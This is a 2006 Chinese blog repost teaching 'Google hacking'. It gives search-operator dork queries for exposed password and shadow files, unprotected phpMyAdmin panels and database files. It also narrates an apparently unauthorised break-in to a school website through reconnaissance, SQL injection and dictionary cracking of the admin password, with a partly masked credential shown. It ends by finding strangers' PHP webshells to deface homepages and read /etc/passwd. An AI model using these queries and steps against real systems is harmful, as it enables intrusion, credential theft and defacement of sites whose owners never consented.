加载中…
个人资料
  • 博客等级:
  • 博客积分:
  • 博客访问:
  • 关注人气:
  • 获赠金笔:0支
  • 赠出金笔:0支
  • 荣誉徽章:
正文 字体大小:

用Google你可瞬间从菜鸟成为黑客

(2006-06-30 15:54:35)
分类: 『电脑知识采集』

    google hacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的
,并无太大实际用
途。google hacking其实并非如此简单...
  google hacking的简单实现
使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们
所想要的),下面
就来介绍一些常用的语法。
  intext:
  这个就是把网页中的正文内容中的某个字符做为搜索条件,例如在google里输入:intext:
动网,将返回所
有在网页正文部分包含"动网"的网页。
  allintext:
  使用方法和intext类似.
  intitle:
  和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符,例如搜索:intitle
:安全天使,将返回
所有网页标题中包含“安全天使”的网页。同理allintitle也同intitle类似。
  cache:
  搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦。
  define:
  搜索某个词语的定义。搜索:define:hacker,将返回关于hacker的定义。
  filetype:
  这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的搜索指定类型的文件。例如
输入:iletype:
doc,将返回所有以doc结尾的文件URL。当然如果你找.bak、.mdb或.inc也是可以的,获得的信
息也许会更丰
富。
  info:
  查找指定站点的一些基本信息。
  inurl:
  搜索我们指定的字符是否存在于URL中。例如输入:inurl:admin,将返回N个类似于这样的
连接:http://
xxx.com/xxx/admin。用来找管理员登陆的URL不错。allinurl也同inurl类似,可指定多个字符
  link:
  例如搜索:inurl:4ngel.net可以返回所有和4ngel.net做了链接的URL。
  site:
  这个也很有用,例如:site:4ngel.net.将返回所有和4ngel.net这个站有关的URL。
 对了还有一些符号也是很有用的:
 + 把google可能忽略的字列如查询范围
  - 把某个字忽略
  ~ 同意词
  . 单一的通配符
  * 通配符,可代表多个字母
  "" 精确查询
  下面开始说说实际应用
  以下内容均在google上搜索,对于一个居心叵测的攻击者来说,可能他最感兴趣的就是密码
文件了。而goo
gle正因为其强大的搜索能力往往会把一些敏感信息透露给他们。用google搜索以下内容:
  intitle:"index of" etc
  intitle:"Index of" .sh_history
  intitle:"Index of" .bash_history
  intitle:"index of" passwd
  intitle:"index of" people.lst
  intitle:"index of" pwd.db
  intitle:"index of" etc/shadow
  intitle:"index of" spwd
  intitle:"index of" master.passwd
  intitle:"index of" htpasswd
  "# -FrontPage-" inurl:service.pwd
  有时候因为各种各样的原因一些重要的密码文件被毫无保护的暴露在网络上,如果被别有用
心的人获得,那么
危害是很大的。同样可以用google来搜索一些具有漏洞的程序,例如ZeroBoard前段时间发现个
文件代码泄露
漏洞,可以用google来找网上使用这套程序的站点:
  intext:ZeroBoard filetype:php
  或者使用:
  inurlutlogin.php?_zb_path= site:.jp
  来寻找我们所需要的页面。phpmyadmin是一套功能强大的数据库操作软件,一些站点由于配
置失误,导致
我们可以不使用密码直接对phpmyadmin进行操作,我们可以用google搜索存在这样漏洞的程序
URL:
  intitle:phpmyadmin intext:Create new database
  还记http://www.xxx.com/_vti_bin/..%5 ... ystem32/cmd.exe?dir吗?用google找找,你
也许还可
以找到很多古董级的机器。 同样我们可以用这个找找有其他cgi漏洞的页面。
  allinurl:winnt system32
  前面已经简单的说过可以用google来搜索数据库文件,用上一些语法来精确查找能够获得更
多东西(access
的数据库,mssql、mysql的连接文件等等).举个例子示例一下:
  allinurl:bbs data
  filetype:mdb inurl:database
  filetype:inc conn
  inurl:data filetype:mdb
  intitle:"index of" data //在一些配置不正确的apache+win32的服务器上经常出现这种情
况,和上面的
原理一样,我们还可以用google来找后台。
利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一
次测试。
首先用google先看这个站点的一些基本情况(一些细节部分就略去了):
  site:xxxx.com
  从返回的信息中,找到几个该校的几个系院的域名:
  顺便ping了一下,应该是在不同的服务器.学校一般都会有不少好的资料,先看看有什么好
东西没。
  site:xxxx.com filetype:doc
  得到N个不错的doc。
  先找找网站的管理后台地址:
  site:xxxx.com intext:管理
  site:xxxx.com inurl:login
  site:xxxx.com intitle:管理
  超过获得2个管理后台地址:
  还算不错,看看服务器上跑的是什么程序:
  site:a2.xxxx.com filetype:asp
  site:a2.xxxx.com filetype:php
  site:a2.xxxx.com filetype:aspx
  site:a3.xxxx.com filetype:asp
  site:.......
  ......
a2服务器用的应该是IIS,上面用的是asp的整站程序,还有一个php的论坛a3服务器也是IIS,
aspx+asp。w
eb程序都应该是自己开发的。有论坛那就看看能不能遇见什么公共的FTP帐号什么的:
site:a2.xxxx.com intext:ftp://*:*
  没找到什么有价值的东西。再看看有没有上传一类的漏洞:
  site:a2.xxxx.com inurl:file
  site:a3.xxxx.com inurl:load
  在a2上发现一个上传文件的页面:
  用IE看了一下,没权限访问。试试注射,
  site:a2.xxxx.com filetype:asp
  得到N个asp页面的地址,体力活就让软件做吧,这套程序明显没有对注射做什么防范,
dbowner权限,虽
然不高但已足矣,back a shell不太喜欢,而且看起来数据库的个头就不小,直接把web管理员
的密码暴出来再
说,MD5加密过。 一般学校的站点的密码都比较有规律,通常都是域名+ 电话一类的变形,用
google搞定吧。
  site:xxxx.com //得到N个二级域名
  site:xxxx.com intext:*@xxxx.com //得到N个邮件地址,还有邮箱的主人的名字什么的
  site:xxxx.com intext:电话 //N个电话
  把什么的信息做个字典吧,挂上慢慢跑。过了一段时间就跑出4个帐号,2个是学生会的,1
个管理员,还有一
个可能是老师的帐号。登陆上去:
  name:网站管理员
  pass:a2xxxx7619 //说了吧,就是域名+4个数字要再怎么提权那就不属于本文讨论访问了,
呵呵,到此为
止。
  这段时间在国外的一些google hack的研究站点看了看,其实也都差不多是一些基本语法的
灵活运用,或者
配合某个脚本漏洞,主要还是靠个人的灵活思维。国外对于google hack方面的防范也并不是很
多,所以大家还
是点到为止,不要去搞破坏拉,呵呵。对于一些在win上跑apache的网管们应该多注意一下这方
面,一个intitle:
index of就差不多都出来了。
  1.查找利用php webshell
  intitle:"php shell*" "Enable stderr" filetype:php
  (注: intitle—网页标题 Enable stderr—UNIX标准输出和标准错误的缩写filetype—文件
类型)。搜索结果
中,你能找到很多直接在机器上执行命令的web shell来。如果找到的PHPSHELL不会利用,如果
你不熟悉UNI
X,可以直接看看LIST,这里就不详细说了,有很多利用价值。要说明的是,我们这里搜索出来
的一些国外的PHP
SHELL上都要使用UNIX命令,都是system调用出来的函数(其实用百度及其他搜索引擎都可以,只
是填写搜索的
内容不同)。这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了:
  echo "召唤" > index.jsp
  现在看看首页,已经被我们改成: "召唤" 了。
  我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后execute Command输入
cat file >
index.html or echo "" > file
  echo "test" >> file
  这样一条条打出来,站点首页就成功被替换了。同样的也可以
  uname -a;cat /etc/passwd
  不过有点要注意,有些WEBSHELL程序有问题,执行不了的,
 

0

阅读 收藏 喜欢 打印举报/Report
  

新浪BLOG意见反馈留言板 欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 产品答疑

新浪公司 版权所有